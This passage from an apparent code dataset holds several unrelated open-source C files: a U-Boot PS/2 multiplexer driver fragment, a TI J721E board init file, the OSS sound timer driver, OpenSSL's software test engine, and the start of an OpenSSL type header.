PRINTF_KEYB("read_input()=0x%02x\n", byte); return byte; } void ps2mult_write_output(u_char val) { int i; PRINTF_KEYB("write_output(0x%02x)\n", val); for (i = 0; i < KBD_TIMEOUT; i++) { if (!kbd_command_active && !mouse_command_active) { break; } udelay(1000); ps2ser_check(); } if (kbd_command_active) { PRINTF("keyboard command not acknoledged\n"); kbd_command_active = 0; } if (mouse_command_active) { PRINTF("mouse command not acknoledged\n"); mouse_command_active = 0; } if (ctl_command_active) { switch (ctl_command_active) { case KBD_CCMD_WRITE_MODE: /* Scan code conversion not supported */ command_byte = val & ~KBD_MODE_KCC; break; case KBD_CCMD_WRITE_AUX_OBUF: ps2mult_receive_byte(val, PS2MULT_MS_SELECTOR); break; case KBD_CCMD_WRITE_MOUSE: ps2mult_send_byte(val, PS2MULT_MS_SELECTOR); break; default: PRINTF("invalid controller command\n"); break; } ctl_command_active = 0; return; } ps2mult_send_byte(val, PS2MULT_KB_SELECTOR); } void ps2mult_write_command(u_char val) { ctl_command_active = 0; PRINTF_KEYB("write_command(0x%02x)\n", val); switch (val) { case KBD_CCMD_READ_MODE: ps2mult_receive_byte(command_byte, PS2MULT_KB_SELECTOR); break; case KBD_CCMD_WRITE_MODE: ctl_command_active = val; break; case KBD_CCMD_MOUSE_DISABLE: break; case KBD_CCMD_MOUSE_ENABLE: break; case KBD_CCMD_SELF_TEST: ps2mult_receive_byte(0x55, PS2MULT_KB_SELECTOR); break; case KBD_CCMD_KBD_TEST: ps2mult_receive_byte(0x00, PS2MULT_KB_SELECTOR); break; case KBD_CCMD_KBD_DISABLE: break; case KBD_CCMD_KBD_ENABLE: break; case KBD_CCMD_WRITE_AUX_OBUF: ctl_command_active = val; break; case KBD_CCMD_WRITE_MOUSE: ctl_command_active = val; break; default: PRINTF("invalid controller command\n"); break; } } static int ps2mult_getc_w (void) { int res = -1; int i; for (i = 0; i < KBD_TIMEOUT; i++) { if (ps2ser_check()) { res = ps2ser_getc(); break; } udelay(1000); } switch (res) { case PS2MULT_KB_SELECTOR: case PS2MULT_MS_SELECTOR: received_selector = res; break; default: break; } return res; } int ps2mult_init (void) { int byte; int kbd_found = 0; int mouse_found = 0; while (get_timer(start_time) < CONFIG_PS2MULT_DELAY); ps2ser_init(); ps2ser_putc(PS2MULT_SESSION_START); ps2ser_putc(PS2MULT_KB_SELECTOR); ps2ser_putc(KBD_CMD_RESET); do { byte = ps2mult_getc_w(); } while (byte >= 0 && byte != KBD_REPLY_ACK); if (byte == KBD_REPLY_ACK) { byte = ps2mult_getc_w(); if (byte == 0xaa) { kbd_found = 1; puts("keyboard"); } } if (!kbd_found) { while (byte >= 0) { byte = ps2mult_getc_w(); } } #if 1 /* detect mouse */ ps2ser_putc(PS2MULT_MS_SELECTOR); ps2ser_putc(AUX_RESET); do { byte = ps2mult_getc_w(); } while (byte >= 0 && byte != AUX_ACK); if (byte == AUX_ACK) { byte = ps2mult_getc_w(); if (byte == 0xaa) { byte = ps2mult_getc_w(); if (byte == 0x00) { mouse_found = 1; puts(", mouse"); } } } if (!mouse_found) { while (byte >= 0) { byte = ps2mult_getc_w(); } } #endif if (mouse_found || kbd_found) { if (!received_selector) { if (mouse_found) { received_selector = PS2MULT_MS_SELECTOR; } else { received_selector = PS2MULT_KB_SELECTOR; } } init_done = 1; } else { puts("No device found"); } puts("\n"); #if 0 /* for testing */ { int i; u_char key[] = { 0x1f, 0x12, 0x14, 0x12, 0x31, 0x2f, 0x39, /* setenv */ 0x1f, 0x14, 0x20, 0x17, 0x31, 0x39, /* stdin */ 0x1f, 0x12, 0x13, 0x17, 0x1e, 0x26, 0x1c, /* serial */ }; for (i = 0; i < sizeof (key); i++) { ps2mult_receive_byte (key[i], PS2MULT_KB_SELECTOR); ps2mult_receive_byte (key[i] | 0x80, PS2MULT_KB_SELECTOR); } } #endif return init_done ? 0 : -1; } int ps2mult_request_irq(void (*handler)(void *)) { keyb_handler = handler; return 0; }
{ "language": "C" }
// SPDX-License-Identifier: GPL-2.0+ /* * Board specific initialization for J721E EVM * * Copyright (C) 2018-2019 Texas Instruments Incorporated - http://www.ti.com/ * Lokesh Vutla <lokeshvutla@ti.com> * */ #include <common.h> #include <init.h> #include <asm/io.h> #include <spl.h> #include <asm/arch/sys_proto.h> DECLARE_GLOBAL_DATA_PTR; int board_init(void) { return 0; } int dram_init(void) { #ifdef CONFIG_PHYS_64BIT gd->ram_size = 0x100000000; #else gd->ram_size = 0x80000000; #endif return 0; } ulong board_get_usable_ram_top(ulong total_size) { #ifdef CONFIG_PHYS_64BIT /* Limit RAM used by U-Boot to the DDR low region */ if (gd->ram_top > 0x100000000) return 0x100000000; #endif return gd->ram_top; } int dram_init_banksize(void) { /* Bank 0 declares the memory available in the DDR low region */ gd->bd->bi_dram[0].start = CONFIG_SYS_SDRAM_BASE; gd->bd->bi_dram[0].size = 0x80000000; gd->ram_size = 0x80000000; #ifdef CONFIG_PHYS_64BIT /* Bank 1 declares the memory available in the DDR high region */ gd->bd->bi_dram[1].start = CONFIG_SYS_SDRAM_BASE1; gd->bd->bi_dram[1].size = 0x80000000; gd->ram_size = 0x100000000; #endif return 0; } #ifdef CONFIG_SPL_LOAD_FIT int board_fit_config_name_match(const char *name) { if (!strcmp(name, "k3-j721e-common-proc-board")) return 0; return -1; } #endif #if defined(CONFIG_OF_LIBFDT) && defined(CONFIG_OF_BOARD_SETUP) int ft_board_setup(void *blob, bd_t *bd) { int ret; ret = fdt_fixup_msmc_ram(blob, "/interconnect@100000", "sram@70000000"); if (ret) printf("%s: fixing up msmc ram failed %d\n", __func__, ret); return ret; } #endif
{ "language": "C" }
/* * sound/oss/sound_timer.c */ /* * Copyright (C) by Hannu Savolainen 1993-1997 * * OSS/Free for Linux is distributed under the GNU GENERAL PUBLIC LICENSE (GPL) * Version 2 (June 1991). See the "COPYING" file distributed with this software * for more info. */ /* * Thomas Sailer : ioctl code reworked (vmalloc/vfree removed) */ #include <linux/string.h> #include <linux/spinlock.h> #include "sound_config.h" static volatile int initialized, opened, tmr_running; static volatile unsigned int tmr_offs, tmr_ctr; static volatile unsigned long ticks_offs; static volatile int curr_tempo, curr_timebase; static volatile unsigned long curr_ticks; static volatile unsigned long next_event_time; static unsigned long prev_event_time; static volatile unsigned long usecs_per_tmr; /* Length of the current interval */ static struct sound_lowlev_timer *tmr; static DEFINE_SPINLOCK(lock); static unsigned long tmr2ticks(int tmr_value) { /* * Convert timer ticks to MIDI ticks */ unsigned long tmp; unsigned long scale; tmp = tmr_value * usecs_per_tmr; /* Convert to usecs */ scale = (60 * 1000000) / (curr_tempo * curr_timebase); /* usecs per MIDI tick */ return (tmp + (scale / 2)) / scale; } void reprogram_timer(void) { unsigned long usecs_per_tick; /* * The user is changing the timer rate before setting a timer * slap, bad bad not allowed. */ if(!tmr) return; usecs_per_tick = (60 * 1000000) / (curr_tempo * curr_timebase); /* * Don't kill the system by setting too high timer rate */ if (usecs_per_tick < 2000) usecs_per_tick = 2000; usecs_per_tmr = tmr->tmr_start(tmr->dev, usecs_per_tick); } void sound_timer_syncinterval(unsigned int new_usecs) { /* * This routine is called by the hardware level if * the clock frequency has changed for some reason. */ tmr_offs = tmr_ctr; ticks_offs += tmr2ticks(tmr_ctr); tmr_ctr = 0; usecs_per_tmr = new_usecs; } EXPORT_SYMBOL(sound_timer_syncinterval); static void tmr_reset(void) { unsigned long flags; spin_lock_irqsave(&lock,flags); tmr_offs = 0; ticks_offs = 0; tmr_ctr = 0; next_event_time = (unsigned long) -1; prev_event_time = 0; curr_ticks = 0; spin_unlock_irqrestore(&lock,flags); } static int timer_open(int dev, int mode) { if (opened) return -EBUSY; tmr_reset(); curr_tempo = 60; curr_timebase = 100; opened = 1; reprogram_timer(); return 0; } static void timer_close(int dev) { opened = tmr_running = 0; tmr->tmr_disable(tmr->dev); } static int timer_event(int dev, unsigned char *event) { unsigned char cmd = event[1]; unsigned long parm = *(int *) &event[4]; switch (cmd) { case TMR_WAIT_REL: parm += prev_event_time; case TMR_WAIT_ABS: if (parm > 0) { long time; if (parm <= curr_ticks) /* It's the time */ return TIMER_NOT_ARMED; time = parm; next_event_time = prev_event_time = time; return TIMER_ARMED; } break; case TMR_START: tmr_reset(); tmr_running = 1; reprogram_timer(); break; case TMR_STOP: tmr_running = 0; break; case TMR_CONTINUE: tmr_running = 1; reprogram_timer(); break; case TMR_TEMPO: if (parm) { if (parm < 8) parm = 8; if (parm > 250) parm = 250; tmr_offs = tmr_ctr; ticks_offs += tmr2ticks(tmr_ctr); tmr_ctr = 0; curr_tempo = parm; reprogram_timer(); } break; case TMR_ECHO: seq_copy_to_input(event, 8); break; default:; } return TIMER_NOT_ARMED; } static unsigned long timer_get_time(int dev) { if (!opened) return 0; return curr_ticks; } static int timer_ioctl(int dev, unsigned int cmd, void __user *arg) { int __user *p = arg; int val; switch (cmd) { case SNDCTL_TMR_SOURCE: val = TMR_INTERNAL; break; case SNDCTL_TMR_START: tmr_reset(); tmr_running = 1; return 0; case SNDCTL_TMR_STOP: tmr_running = 0; return 0; case SNDCTL_TMR_CONTINUE: tmr_running = 1; return 0; case SNDCTL_TMR_TIMEBASE: if (get_user(val, p)) return -EFAULT; if (val) { if (val < 1) val = 1; if (val > 1000) val = 1000; curr_timebase = val; } val = curr_timebase; break; case SNDCTL_TMR_TEMPO: if (get_user(val, p)) return -EFAULT; if (val) { if (val < 8) val = 8; if (val > 250) val = 250; tmr_offs = tmr_ctr; ticks_offs += tmr2ticks(tmr_ctr); tmr_ctr = 0; curr_tempo = val; reprogram_timer(); } val = curr_tempo; break; case SNDCTL_SEQ_CTRLRATE: if (get_user(val, p)) return -EFAULT; if (val != 0) /* Can't change */ return -EINVAL; val = ((curr_tempo * curr_timebase) + 30) / 60; break; case SNDCTL_SEQ_GETTIME: val = curr_ticks; break; case SNDCTL_TMR_METRONOME: default: return -EINVAL; } return put_user(val, p); } static void timer_arm(int dev, long time) { if (time < 0) time = curr_ticks + 1; else if (time <= curr_ticks) /* It's the time */ return; next_event_time = prev_event_time = time; return; } static struct sound_timer_operations sound_timer = { .owner = THIS_MODULE, .info = {"Sound Timer", 0}, .priority = 1, /* Priority */ .devlink = 0, /* Local device link */ .open = timer_open, .close = timer_close, .event = timer_event, .get_time = timer_get_time, .ioctl = timer_ioctl, .arm_timer = timer_arm }; void sound_timer_interrupt(void) { unsigned long flags; if (!opened) return; tmr->tmr_restart(tmr->dev); if (!tmr_running) return; spin_lock_irqsave(&lock,flags); tmr_ctr++; curr_ticks = ticks_offs + tmr2ticks(tmr_ctr); if (curr_ticks >= next_event_time) { next_event_time = (unsigned long) -1; sequencer_timer(0); } spin_unlock_irqrestore(&lock,flags); } EXPORT_SYMBOL(sound_timer_interrupt); void sound_timer_init(struct sound_lowlev_timer *t, char *name) { int n; if (initialized) { if (t->priority <= tmr->priority) return; /* There is already a similar or better timer */ tmr = t; return; } initialized = 1; tmr = t; n = sound_alloc_timerdev(); if (n == -1) n = 0; /* Overwrite the system timer */ strlcpy(sound_timer.info.name, name, sizeof(sound_timer.info.name)); sound_timer_devs[n] = &sound_timer; } EXPORT_SYMBOL(sound_timer_init);
{ "language": "C" }
/* crypto/engine/eng_openssl.c */ /* Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL * project 2000. */ /* ==================================================================== * Copyright (c) 1999-2001 The OpenSSL Project. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. All advertising materials mentioning features or use of this * software must display the following acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)" * * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to * endorse or promote products derived from this software without * prior written permission. For written permission, please contact * licensing@OpenSSL.org. * * 5. Products derived from this software may not be called "OpenSSL" * nor may "OpenSSL" appear in their names without prior written * permission of the OpenSSL Project. * * 6. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)" * * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * ==================================================================== * * This product includes cryptographic software written by Eric Young * (eay@cryptsoft.com). This product includes software written by Tim * Hudson (tjh@cryptsoft.com). * */ /* ==================================================================== * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED. * ECDH support in OpenSSL originally developed by * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project. */ #include <stdio.h> #include <openssl/crypto.h> #include "cryptlib.h" #include <openssl/engine.h> #include <openssl/dso.h> #include <openssl/pem.h> #include <openssl/evp.h> #include <openssl/rand.h> #ifndef OPENSSL_NO_RSA #include <openssl/rsa.h> #endif #ifndef OPENSSL_NO_DSA #include <openssl/dsa.h> #endif #ifndef OPENSSL_NO_DH #include <openssl/dh.h> #endif /* This testing gunk is implemented (and explained) lower down. It also assumes * the application explicitly calls "ENGINE_load_openssl()" because this is no * longer automatic in ENGINE_load_builtin_engines(). */ #define TEST_ENG_OPENSSL_RC4 #define TEST_ENG_OPENSSL_PKEY /* #define TEST_ENG_OPENSSL_RC4_OTHERS */ #define TEST_ENG_OPENSSL_RC4_P_INIT /* #define TEST_ENG_OPENSSL_RC4_P_CIPHER */ #define TEST_ENG_OPENSSL_SHA /* #define TEST_ENG_OPENSSL_SHA_OTHERS */ /* #define TEST_ENG_OPENSSL_SHA_P_INIT */ /* #define TEST_ENG_OPENSSL_SHA_P_UPDATE */ /* #define TEST_ENG_OPENSSL_SHA_P_FINAL */ /* Now check what of those algorithms are actually enabled */ #ifdef OPENSSL_NO_RC4 #undef TEST_ENG_OPENSSL_RC4 #undef TEST_ENG_OPENSSL_RC4_OTHERS #undef TEST_ENG_OPENSSL_RC4_P_INIT #undef TEST_ENG_OPENSSL_RC4_P_CIPHER #endif #if defined(OPENSSL_NO_SHA) || defined(OPENSSL_NO_SHA0) || defined(OPENSSL_NO_SHA1) #undef TEST_ENG_OPENSSL_SHA #undef TEST_ENG_OPENSSL_SHA_OTHERS #undef TEST_ENG_OPENSSL_SHA_P_INIT #undef TEST_ENG_OPENSSL_SHA_P_UPDATE #undef TEST_ENG_OPENSSL_SHA_P_FINAL #endif #ifdef TEST_ENG_OPENSSL_RC4 static int openssl_ciphers(ENGINE *e, const EVP_CIPHER **cipher, const int **nids, int nid); #endif #ifdef TEST_ENG_OPENSSL_SHA static int openssl_digests(ENGINE *e, const EVP_MD **digest, const int **nids, int nid); #endif #ifdef TEST_ENG_OPENSSL_PKEY static EVP_PKEY *openssl_load_privkey(ENGINE *eng, const char *key_id, UI_METHOD *ui_method, void *callback_data); #endif /* The constants used when creating the ENGINE */ static const char *engine_openssl_id = "openssl"; static const char *engine_openssl_name = "Software engine support"; /* This internal function is used by ENGINE_openssl() and possibly by the * "dynamic" ENGINE support too */ static int bind_helper(ENGINE *e) { if(!ENGINE_set_id(e, engine_openssl_id) || !ENGINE_set_name(e, engine_openssl_name) #ifndef TEST_ENG_OPENSSL_NO_ALGORITHMS #ifndef OPENSSL_NO_RSA || !ENGINE_set_RSA(e, RSA_get_default_method()) #endif #ifndef OPENSSL_NO_DSA || !ENGINE_set_DSA(e, DSA_get_default_method()) #endif #ifndef OPENSSL_NO_ECDH || !ENGINE_set_ECDH(e, ECDH_OpenSSL()) #endif #ifndef OPENSSL_NO_ECDSA || !ENGINE_set_ECDSA(e, ECDSA_OpenSSL()) #endif #ifndef OPENSSL_NO_DH || !ENGINE_set_DH(e, DH_get_default_method()) #endif || !ENGINE_set_RAND(e, RAND_SSLeay()) #ifdef TEST_ENG_OPENSSL_RC4 || !ENGINE_set_ciphers(e, openssl_ciphers) #endif #ifdef TEST_ENG_OPENSSL_SHA || !ENGINE_set_digests(e, openssl_digests) #endif #endif #ifdef TEST_ENG_OPENSSL_PKEY || !ENGINE_set_load_privkey_function(e, openssl_load_privkey) #endif ) return 0; /* If we add errors to this ENGINE, ensure the error handling is setup here */ /* openssl_load_error_strings(); */ return 1; } static ENGINE *engine_openssl(void) { ENGINE *ret = ENGINE_new(); if(!ret) return NULL; if(!bind_helper(ret)) { ENGINE_free(ret); return NULL; } return ret; } void ENGINE_load_openssl(void) { ENGINE *toadd = engine_openssl(); if(!toadd) return; ENGINE_add(toadd); /* If the "add" worked, it gets a structural reference. So either way, * we release our just-created reference. */ ENGINE_free(toadd); ERR_clear_error(); } /* This stuff is needed if this ENGINE is being compiled into a self-contained * shared-library. */ #ifdef ENGINE_DYNAMIC_SUPPORT static int bind_fn(ENGINE *e, const char *id) { if(id && (strcmp(id, engine_openssl_id) != 0)) return 0; if(!bind_helper(e)) return 0; return 1; } IMPLEMENT_DYNAMIC_CHECK_FN() IMPLEMENT_DYNAMIC_BIND_FN(bind_fn) #endif /* ENGINE_DYNAMIC_SUPPORT */ #ifdef TEST_ENG_OPENSSL_RC4 /* This section of code compiles an "alternative implementation" of two modes of * RC4 into this ENGINE. The result is that EVP_CIPHER operation for "rc4" * should under normal circumstances go via this support rather than the default * EVP support. There are other symbols to tweak the testing; * TEST_ENC_OPENSSL_RC4_OTHERS - print a one line message to stderr each time * we're asked for a cipher we don't support (should not happen). * TEST_ENG_OPENSSL_RC4_P_INIT - print a one line message to stderr each time * the "init_key" handler is called. * TEST_ENG_OPENSSL_RC4_P_CIPHER - ditto for the "cipher" handler. */ #include <openssl/rc4.h> #define TEST_RC4_KEY_SIZE 16 static int test_cipher_nids[] = {NID_rc4,NID_rc4_40}; static int test_cipher_nids_number = 2; typedef struct { unsigned char key[TEST_RC4_KEY_SIZE]; RC4_KEY ks; } TEST_RC4_KEY; #define test(ctx) ((TEST_RC4_KEY *)(ctx)->cipher_data) static int test_rc4_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key, const unsigned char *iv, int enc) { #ifdef TEST_ENG_OPENSSL_RC4_P_INIT fprintf(stderr, "(TEST_ENG_OPENSSL_RC4) test_init_key() called\n"); #endif memcpy(&test(ctx)->key[0],key,EVP_CIPHER_CTX_key_length(ctx)); RC4_set_key(&test(ctx)->ks,EVP_CIPHER_CTX_key_length(ctx), test(ctx)->key); return 1; } static int test_rc4_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out, const unsigned char *in, unsigned int inl) { #ifdef TEST_ENG_OPENSSL_RC4_P_CIPHER fprintf(stderr, "(TEST_ENG_OPENSSL_RC4) test_cipher() called\n"); #endif RC4(&test(ctx)->ks,inl,in,out); return 1; } static const EVP_CIPHER test_r4_cipher= { NID_rc4, 1,TEST_RC4_KEY_SIZE,0, EVP_CIPH_VARIABLE_LENGTH, test_rc4_init_key, test_rc4_cipher, NULL, sizeof(TEST_RC4_KEY), NULL, NULL, NULL, NULL }; static const EVP_CIPHER test_r4_40_cipher= { NID_rc4_40, 1,5 /* 40 bit */,0, EVP_CIPH_VARIABLE_LENGTH, test_rc4_init_key, test_rc4_cipher, NULL, sizeof(TEST_RC4_KEY), NULL, NULL, NULL, NULL }; static int openssl_ciphers(ENGINE *e, const EVP_CIPHER **cipher, const int **nids, int nid) { if(!cipher) { /* We are returning a list of supported nids */ *nids = test_cipher_nids; return test_cipher_nids_number; } /* We are being asked for a specific cipher */ if(nid == NID_rc4) *cipher = &test_r4_cipher; else if(nid == NID_rc4_40) *cipher = &test_r4_40_cipher; else { #ifdef TEST_ENG_OPENSSL_RC4_OTHERS fprintf(stderr, "(TEST_ENG_OPENSSL_RC4) returning NULL for " "nid %d\n", nid); #endif *cipher = NULL; return 0; } return 1; } #endif #ifdef TEST_ENG_OPENSSL_SHA /* Much the same sort of comment as for TEST_ENG_OPENSSL_RC4 */ #include <openssl/sha.h> static int test_digest_nids[] = {NID_sha1}; static int test_digest_nids_number = 1; static int test_sha1_init(EVP_MD_CTX *ctx) { #ifdef TEST_ENG_OPENSSL_SHA_P_INIT fprintf(stderr, "(TEST_ENG_OPENSSL_SHA) test_sha1_init() called\n"); #endif return SHA1_Init(ctx->md_data); } static int test_sha1_update(EVP_MD_CTX *ctx,const void *data,size_t count) { #ifdef TEST_ENG_OPENSSL_SHA_P_UPDATE fprintf(stderr, "(TEST_ENG_OPENSSL_SHA) test_sha1_update() called\n"); #endif return SHA1_Update(ctx->md_data,data,count); } static int test_sha1_final(EVP_MD_CTX *ctx,unsigned char *md) { #ifdef TEST_ENG_OPENSSL_SHA_P_FINAL fprintf(stderr, "(TEST_ENG_OPENSSL_SHA) test_sha1_final() called\n"); #endif return SHA1_Final(md,ctx->md_data); } static const EVP_MD test_sha_md= { NID_sha1, NID_sha1WithRSAEncryption, SHA_DIGEST_LENGTH, 0, test_sha1_init, test_sha1_update, test_sha1_final, NULL, NULL, EVP_PKEY_RSA_method, SHA_CBLOCK, sizeof(EVP_MD *)+sizeof(SHA_CTX), }; static int openssl_digests(ENGINE *e, const EVP_MD **digest, const int **nids, int nid) { if(!digest) { /* We are returning a list of supported nids */ *nids = test_digest_nids; return test_digest_nids_number; } /* We are being asked for a specific digest */ if(nid == NID_sha1) *digest = &test_sha_md; else { #ifdef TEST_ENG_OPENSSL_SHA_OTHERS fprintf(stderr, "(TEST_ENG_OPENSSL_SHA) returning NULL for " "nid %d\n", nid); #endif *digest = NULL; return 0; } return 1; } #endif #ifdef TEST_ENG_OPENSSL_PKEY static EVP_PKEY *openssl_load_privkey(ENGINE *eng, const char *key_id, UI_METHOD *ui_method, void *callback_data) { BIO *in; EVP_PKEY *key; fprintf(stderr, "(TEST_ENG_OPENSSL_PKEY)Loading Private key %s\n", key_id); in = BIO_new_file(key_id, "r"); if (!in) return NULL; key = PEM_read_bio_PrivateKey(in, NULL, 0, NULL); BIO_free(in); return key; } #endif
{ "language": "C" }
/* ==================================================================== * Copyright (c) 1998-2001 The OpenSSL Project. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. All advertising materials mentioning features or use of this * software must display the following acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit. (http://www.openssl.org/)" * * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to * endorse or promote products derived from this software without * prior written permission. For written permission, please contact * openssl-core@openssl.org. * * 5. Products derived from this software may not be called "OpenSSL" * nor may "OpenSSL" appear in their names without prior written * permission of the OpenSSL Project. * * 6. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit (http://www.openssl.org/)" * * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * ==================================================================== * * This product includes cryptographic software written by Eric Young * (eay@cryptsoft.com). This product includes software written by Tim * Hudson (tjh@cryptsoft.com). * */ #ifndef HEADER_OPENSSL_TYPES_H #define HEADER_OPENSSL_TYPES_H #include <openssl/e_os2.h> #ifdef NO_ASN1_TYPEDEFS #define ASN1_INTEGER ASN1_STRING #define ASN1_ENUMERATED ASN1_STRING #define ASN1_BIT_STRING ASN1_STRING #define ASN1_OCTET_STRING ASN1_STRING #define ASN1_PRINTABLESTRING ASN1_STRING #define ASN1_T61STRING ASN1_STRING #define ASN1_IA5STRING ASN1_STRING #define ASN1_UTCTIME ASN1_STRING #define ASN1_GENERALIZEDTIME ASN1_STRING #define ASN1_TIME ASN1_STRING #define ASN1_GENERALSTRING ASN1_STRING #define ASN1_UNIVERSALSTRING ASN1_STRING #define ASN1_BMPSTRING ASN1_STRING #define ASN1_VISIBLESTRING ASN1_STRING #define ASN1_UTF8STRING ASN1_STRING #define ASN1_BOOLEAN int #define ASN1_NULL int #else typedef struct asn1_string_st ASN1_INTEGER; typedef struct asn1_string_st ASN1_ENUMERATED; typedef struct asn1_string_st ASN1_BIT_STRING; typedef struct asn1_string_st ASN1_OCTET_STRING; typedef struct asn1_string_st ASN1_PRINTABLESTRING; typedef struct asn1_string_st ASN1_T61STRING; typedef struct asn1_string_st ASN1_IA5STRING; typedef struct asn1_string_st ASN1_GENERALSTRING; typedef struct asn1_string_st ASN1_UNIVERSALSTRING; typedef struct asn1_string_st ASN1_BMPSTRING; typedef struct asn1_string_st ASN1_UTCTIME; typedef struct asn1_string_st ASN1_TIME; typedef struct asn1_string_st ASN1_GENERALIZEDTIME; typedef struct asn1_string_st ASN1_VISIBLESTRING; typedef struct asn1_string_st ASN1_UTF8STRING; typedef int ASN1_BOOLEAN; typedef int ASN1_NULL; #endif typedef struct asn1_pctx_st ASN1_PCTX; #ifdef OPENSSL_SYS_WIN32 #undef X509_NAME #undef X509_EXTENSIONS #undef X509_CERT_PAIR #undef PKCS7_ISSUER_AND_SERIAL #undef OCSP_REQUEST #undef OCSP_RESPONSE #endif #ifdef BIGNUM #undef BIGNUM #endif typedef struct bignum_st BIGNUM; typedef struct bignum_ctx BN_CTX; typedef struct bn_blinding_st BN_BLINDING; typedef struct bn_mont_ctx_st BN_MONT_CTX; typedef struct bn_recp_ctx_st BN_RECP_CTX; typedef struct bn_gencb_st BN_GENCB; typedef struct buf_mem_st BUF_MEM; typedef struct evp_cipher_st EVP_CIPHER; typedef struct evp_cipher_ctx_st EVP_CIPHER_CTX; typedef struct env_md_st EVP_MD; typedef struct env_md_ctx_st EVP_MD_CTX; typedef struct evp_pkey_st EVP_PKEY; typedef struct evp_pkey_asn1_method_st EVP_PKEY_ASN1_METHOD; typedef struct evp_pkey_method_st EVP_PKEY_METHOD; typedef struct evp_pkey_ctx_st EVP_PKEY_CTX; typedef struct dh_st DH; typedef struct dh_method DH_METHOD; typedef struct dsa_st DSA; typedef struct dsa_method DSA_METHOD; typedef struct rsa_st RSA; typedef struct rsa_meth_st RSA_METHOD; typedef struct rand_meth_st RAND_METHOD; typedef struct ecdh_method ECDH_METHOD; typedef struct ecdsa_method ECDSA_METHOD; typedef struct x509_st X509; typedef struct X509_algor_st X509_ALGOR; typedef struct X509_crl_st X509_CRL; typedef struct x509_crl_method_st X509_CRL_METHOD; typedef struct x509_revoked_st X509_REVOKED; typedef struct X509_name_st X509_NAME; typedef struct X509_pubkey_st X509_PUBKEY; typedef struct x509_store_st X509_STORE; typedef struct x509_store_ctx_st X509_STORE_CTX; typedef struct pkcs8_priv_key_info_st PKCS8_PRIV_KEY_INFO; typedef struct v3_ext_ctx X509V3_CTX; typedef struct conf_st CONF; typedef struct store_st STORE; typedef struct store_method_st STORE_METHOD; typedef struct ui_st UI; typedef struct ui_method_st UI_METHOD; typedef struct st_ERR_FNS ERR_FNS; typedef struct engine_st ENGINE; typedef struct ssl_st SSL; typedef struct ssl_ctx_st SSL_CTX; typedef struct X509_POLICY_NODE_st X509_POLICY_NODE; typedef struct X509_POLICY_LEVEL_st X509_POLICY_LEVEL; typedef struct X509_POLICY_TREE_st X509_POLICY_TREE; typedef struct X509_POLICY_CACHE_st X509_POLICY_CACHE; typedef struct AUTHORITY_KEYID_st AUTHORITY_KEYID; typedef struct DIST_POINT_st DIST_POINT; typedef struct ISSUING_DIST_POINT_st ISSUING_DIST_POINT; typedef struct NAME_CONSTRAINTS_st NAME_CONSTRAINTS; /* If placed in pkcs12.h, we end up with a circular depency with pkcs7.h */ #define DECLARE_PKCS12_STACK_OF(type) /* Nothing */ #define IMPLEMENT_PKCS12_STACK_OF(type) /* Nothing */ typedef struct crypto_ex_data_st CRYPTO_EX_DATA; /* Callback types for crypto.h */ typedef int CRYPTO_EX_new(void *parent, void *ptr, CRYPTO_EX_DATA *ad, int idx, long argl, void *argp); typedef void 